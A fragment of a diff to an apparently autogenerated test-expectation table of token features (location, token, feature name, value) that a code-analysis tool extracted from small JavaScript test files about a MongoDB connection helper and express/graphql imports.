(fn) | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:34:8:39 | DB_URL | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:34:8:39 | DB_URL | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:34:8:39 | DB_URL | fileImports | mongodb | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:42:8:43 | {} | CalleeFlexibleAccessPath | dbClient.connect | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:42:8:43 | {} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:42:8:43 | {} | calleeImports | mongodb | @@ -132,6 +929,16 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:42:8:43 | {} | enclosingFunctionName | connect | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:42:8:43 | {} | fileImports | mongodb | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:42:8:43 | {} | receiverName | dbClient | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:8:45 | fn | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:8:45 | fn | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:8:45 | fn | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:8:45 | fn | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:8:45 | fn | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:11:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:11:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:11:5 | 'arguments' object of anonymous function | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:11:5 | 'arguments' object of anonymous function | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:11:5 | 'arguments' object of anonymous function | fileImports | mongodb | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:11:5 | (err, c ... ;\\n } | CalleeFlexibleAccessPath | dbClient.connect | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:11:5 | (err, c ... ;\\n } | InputArgumentIndex | 2 | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:11:5 | (err, c ... ;\\n } | calleeImports | mongodb | @@ -141,6 +948,86 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:11:5 | (err, c ... ;\\n } | enclosingFunctionName | connect | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:11:5 | (err, c ... ;\\n } | fileImports | mongodb | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:11:5 | (err, c ... ;\\n } | receiverName | dbClient | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:11:5 | exceptional return of anonymous function | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:11:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:11:5 | exceptional return of anonymous function | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:11:5 | exceptional return of anonymous function | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:11:5 | exceptional return of anonymous function | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:11:5 | return of anonymous function | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:11:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:11:5 | return of anonymous function | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:11:5 | return of anonymous function | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:46:11:5 | return of anonymous function | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:47:8:49 | err | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:47:8:49 | err | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:47:8:49 | err | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:47:8:49 | err | contextSurroundingFunctionParameters | (fn)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:47:8:49 | err | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:47:8:49 | err | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:47:8:49 | err | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:47:8:49 | err | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:47:8:49 | err | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:47:8:49 | err | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:52:8:57 | client | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:52:8:57 | client | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:52:8:57 | client | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:52:8:57 | client | contextSurroundingFunctionParameters | (fn)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:52:8:57 | client | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:52:8:57 | client | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:52:8:57 | client | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:52:8:57 | client | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:52:8:57 | client | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:52:8:57 | client | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:7:9:8 | db | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:7:9:8 | db | contextSurroundingFunctionParameters | (fn)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:7:9:8 | db | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:7:9:8 | db | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:7:9:8 | db | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:7:9:41 | db | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:7:9:41 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:7:9:41 | db | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:7:9:41 | db | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:7:9:41 | db | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:7:9:41 | db = cl ... B_NAME) | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:7:9:41 | db = cl ... B_NAME) | contextSurroundingFunctionParameters | (fn)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:7:9:41 | db = cl ... B_NAME) | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:7:9:41 | db = cl ... B_NAME) | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:7:9:41 | db = cl ... B_NAME) | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:12:9:17 | client | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:12:9:17 | client | contextSurroundingFunctionParameters | (fn)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:12:9:17 | client | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:12:9:17 | client | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:12:9:17 | client | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:12:9:20 | client.db | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:12:9:20 | client.db | contextSurroundingFunctionParameters | (fn)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:12:9:20 | client.db | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:12:9:20 | client.db | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:12:9:20 | client.db | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:12:9:41 | client. ... B_NAME) | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:12:9:41 | client. ... B_NAME) | contextSurroundingFunctionParameters | (fn)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:12:9:41 | client. ... B_NAME) | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:12:9:41 | client. ... B_NAME) | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:12:9:41 | client. ... B_NAME) | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:12:9:41 | exceptional return of client. ... B_NAME) | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:12:9:41 | exceptional return of client. ... B_NAME) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:12:9:41 | exceptional return of client. ... B_NAME) | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:12:9:41 | exceptional return of client. ... B_NAME) | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:12:9:41 | exceptional return of client. ... B_NAME) | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:19:9:20 | db | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:19:9:20 | db | contextSurroundingFunctionParameters | (fn)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:19:9:20 | db | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:19:9:20 | db | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:19:9:20 | db | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:22:9:28 | process | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:22:9:28 | process | contextSurroundingFunctionParameters | (fn)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:22:9:28 | process | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:22:9:28 | process | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:22:9:28 | process | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:22:9:32 | process.env | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:22:9:32 | process.env | contextSurroundingFunctionParameters | (fn)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:22:9:32 | process.env | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:22:9:32 | process.env | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:22:9:32 | process.env | fileImports | mongodb | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:22:9:40 | process.env.DB_NAME | CalleeFlexibleAccessPath | client.db | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:22:9:40 | process.env.DB_NAME | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:22:9:40 | process.env.DB_NAME | contextFunctionInterfaces | connect(fn)\ndb() | @@ -149,6 +1036,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:22:9:40 | process.env.DB_NAME | enclosingFunctionName | connect | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:22:9:40 | process.env.DB_NAME | fileImports | mongodb | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:22:9:40 | process.env.DB_NAME | receiverName | client | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:30:9:32 | env | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:30:9:32 | env | contextSurroundingFunctionParameters | (fn)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:30:9:32 | env | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:30:9:32 | env | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:30:9:32 | env | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:34:9:40 | DB_NAME | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:34:9:40 | DB_NAME | contextSurroundingFunctionParameters | (fn)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:34:9:40 | DB_NAME | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:34:9:40 | DB_NAME | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:9:34:9:40 | DB_NAME | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:10:14:10:15 | fn | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:10:14:10:15 | fn | contextSurroundingFunctionParameters | (fn)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:10:14:10:15 | fn | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:10:14:10:15 | fn | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:10:14:10:15 | fn | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:10:14:10:20 | exceptional return of fn(err) | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:10:14:10:20 | exceptional return of fn(err) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:10:14:10:20 | exceptional return of fn(err) | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:10:14:10:20 | exceptional return of fn(err) | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:10:14:10:20 | exceptional return of fn(err) | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:10:14:10:20 | fn(err) | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:10:14:10:20 | fn(err) | contextSurroundingFunctionParameters | (fn)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:10:14:10:20 | fn(err) | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:10:14:10:20 | fn(err) | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:10:14:10:20 | fn(err) | fileImports | mongodb | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:10:17:10:19 | err | CalleeFlexibleAccessPath | fn | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:10:17:10:19 | err | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:10:17:10:19 | err | contextFunctionInterfaces | connect(fn)\ndb() | @@ -156,12 +1068,133 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:10:17:10:19 | err | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:10:17:10:19 | err | enclosingFunctionName | connect | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:10:17:10:19 | err | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:0 | this | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:0 | this | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | github | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | github | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | github | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | graphql | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | graphql | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | graphql | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | kit | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | kit | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | kit | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | kit2 | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | kit2 | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | kit2 | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | nativeGraphql | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | nativeGraphql | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | nativeGraphql | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | request | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | request | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | request | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | require | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | require | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | root | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | root | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | root | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | schema | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | schema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | schema | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | withCustomRequest | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | withCustomRequest | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:1:1:1 | withCustomRequest | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:5:1:11 | express | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:5:1:11 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:5:1:11 | express | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:5:1:32 | express | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:5:1:32 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:5:1:32 | express | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:5:1:32 | express ... press') | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:5:1:32 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:5:1:32 | express ... press') | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:15:1:21 | require | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:15:1:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:15:1:21 | require | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:15:1:32 | exceptional return of require('express') | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:15:1:32 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:15:1:32 | exceptional return of require('express') | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:15:1:32 | require('express') | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:15:1:32 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:15:1:32 | require('express') | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:23:1:31 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:23:1:31 | 'express' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:23:1:31 | 'express' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:23:1:31 | 'express' | contextFunctionInterfaces | hello() | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:23:1:31 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:1:23:1:31 | 'express' | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:2:5:2:7 | app | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:2:5:2:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:2:5:2:7 | app | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:2:5:2:19 | app | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:2:5:2:19 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:2:5:2:19 | app | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:2:5:2:19 | app = express() | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:2:5:2:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:2:5:2:19 | app = express() | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:2:11:2:17 | express | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:2:11:2:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:2:11:2:17 | express | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:2:11:2:19 | exceptional return of express() | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:2:11:2:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:2:11:2:19 | exceptional return of express() | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:2:11:2:19 | express() | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:2:11:2:19 | express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:2:11:2:19 | express() | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:4:1:4:40 | import ... /core"; | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:4:1:4:40 | import ... /core"; | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:4:1:4:40 | import ... /core"; | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| 